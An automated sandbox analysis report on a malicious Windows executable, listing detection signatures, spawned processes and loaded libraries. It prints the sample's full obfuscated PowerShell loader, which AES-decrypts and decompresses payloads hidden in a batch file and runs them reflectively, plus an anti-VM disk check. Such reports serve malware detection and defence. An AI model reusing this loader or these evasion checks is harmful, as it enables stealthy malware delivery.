Windows Analysis Report
XgKnAQpuPM.exe

Overview

General Information

Sample name: XgKnAQpuPM.exe
renamed because original name is a hash value
Original sample name: 52c1acdcbb715dd099648b26b98254e8.exe
Analysis ID: 1528503
MD5: 52c1acdcbb715dd099648b26b98254e8
SHA1: e3cd07adc9d8fe7c2fbb07730845af6555af2e66
SHA256: 8dc774bd289aeb18dee994fea6e69039d9c6e77a1b90a0d9db004109735ef3f9
Tags: 64exe
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code contains potential unpacker
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D13214 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA, 0_2_00007FF776D13214

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 7.2.powershell.exe.1c691b00b88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.powershell.exe.1c690beb3b8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.powershell.exe.1c691600b50.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.powershell.exe.1c691b00b88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2185544424.000001C6916F8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2029388668.000001C68BEA1000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2185544424.000001C691B00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2185544424.000001C690CF8000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR
Source: XgKnAQpuPM.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: System.Configuration.Install.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: wextract.pdb source: XgKnAQpuPM.exe
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdbl source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: wextract.pdbGCTL source: XgKnAQpuPM.exe
Source: Binary string: System.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.CSharp.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdbP4~ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.ni.pdbRSDSC source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Configuration.Install.pdbP source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Xml.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.DirectoryServices.pdb` source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Data.pdbH source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.Automation.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: mscorlib.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdbRSDS~ source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WERAC0C.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERAC0C.tmp.dmp.10.dr
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12034 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00007FF776D12034
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.10.dr String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp, Null.7.dr String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2029388668.000001C680001000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6xG
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.2029388668.000001C6802D2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2185544424.000001C69008B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12D97 GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle, 0_2_00007FF776D12D97
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx, 0_2_00007FF776D11BF4
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\$rbx-onimai2 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11D10 0_2_00007FF776D11D10
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D16F14 0_2_00007FF776D16F14
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D168F0 0_2_00007FF776D168F0
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D141B4 0_2_00007FF776D141B4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12F7B 0_2_00007FF776D12F7B
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D15F80 0_2_00007FF776D15F80
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11BF4 0_2_00007FF776D11BF4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D15F7E 0_2_00007FF776D15F7E
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D1366E 0_2_00007FF776D1366E
One or more processes crash
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
PE file contains executable resources (Code or Archives)
Source: XgKnAQpuPM.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3397176 bytes, 1 file, at 0x2c +A "vclib.bat", ID 885, number 1, 157 datablocks, 0x1503 compression
Sample file is different than original file name gathered from version info
Source: XgKnAQpuPM.exe Binary or memory string: OriginalFilename vs XgKnAQpuPM.exe
Source: XgKnAQpuPM.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs XgKnAQpuPM.exe
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2701
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2701 Jump to behavior
Yara signature match
Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal92.expl.evad.winEXE@14/11@1/0
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D16F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, 0_2_00007FF776D16F14
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D11BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx, 0_2_00007FF776D11BF4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D16F14 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, 0_2_00007FF776D16F14
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D12F7B CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17, 0_2_00007FF776D12F7B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\7749332
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3352
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Process created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"
Source: XgKnAQpuPM.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: unknown Process created: C:\Users\user\Desktop\XgKnAQpuPM.exe "C:\Users\user\Desktop\XgKnAQpuPM.exe"
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Process created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3352 -s 1576
Source: unknown Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Process created: C:\Windows\System32\cmd.exe cmd /c "vclib.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function FpxON($kXGHT){ $MjRuR=[System.Security.Cryptography.Aes]::Create(); $MjRuR.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MjRuR.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MjRuR.Key=[System.Convert]::FromBase64String('j3+l8MVXgSNKBboFFtDIY9ifLLQEhU8Shlqb9W611kU='); $MjRuR.IV=[System.Convert]::FromBase64String('C7Dlt1nshFAIyjxeP0iXIQ=='); $WVvmF=$MjRuR.CreateDecryptor(); $CVTyC=$WVvmF.TransformFinalBlock($kXGHT, 0, $kXGHT.Length); $WVvmF.Dispose(); $MjRuR.Dispose(); $CVTyC;}function ogptr($kXGHT){ Invoke-Expression '$bJDne=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$kXGHT);'.Replace('blck', ''); Invoke-Expression '$eTtPQ=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$gtTnv=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($bJDne, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $gtTnv.CopyTo($eTtPQ); $gtTnv.Dispose(); $bJDne.Dispose(); $eTtPQ.Dispose(); $eTtPQ.ToArray();}function VcYYT($kXGHT,$GOojW){ Invoke-Expression '$CHMLi=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$kXGHT);'.Replace('blck', ''); Invoke-Expression '$WMCoT=$CHMLi.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$WMCoT.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $GOojW)blck;'.Replace('blck', '');}$YesWH = 'C:\Users\user\AppData\Local\Temp\IXP000.TMP\vclib.bat';$host.UI.RawUI.WindowTitle = $YesWH;$lzgCG=[System.IO.File]::ReadAllText($YesWH).Split([Environment]::NewLine);foreach ($zwDbB in $lzgCG) { if ($zwDbB.StartsWith(':: ')) { $gGIZq=$zwDbB.Substring(3); break; }}$nciXK=[string[]]$gGIZq.Split('\');Invoke-Expression '$mmTjj=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[0])));'.Replace('blck', '');Invoke-Expression '$gDpGZ=ogptr (FpxON (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($nciXK[1])));'.Replace('blck', '');VcYYT $mmTjj (,[string[]] (''));VcYYT $gDpGZ (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: feclient.dll Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Section loaded: advpack.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
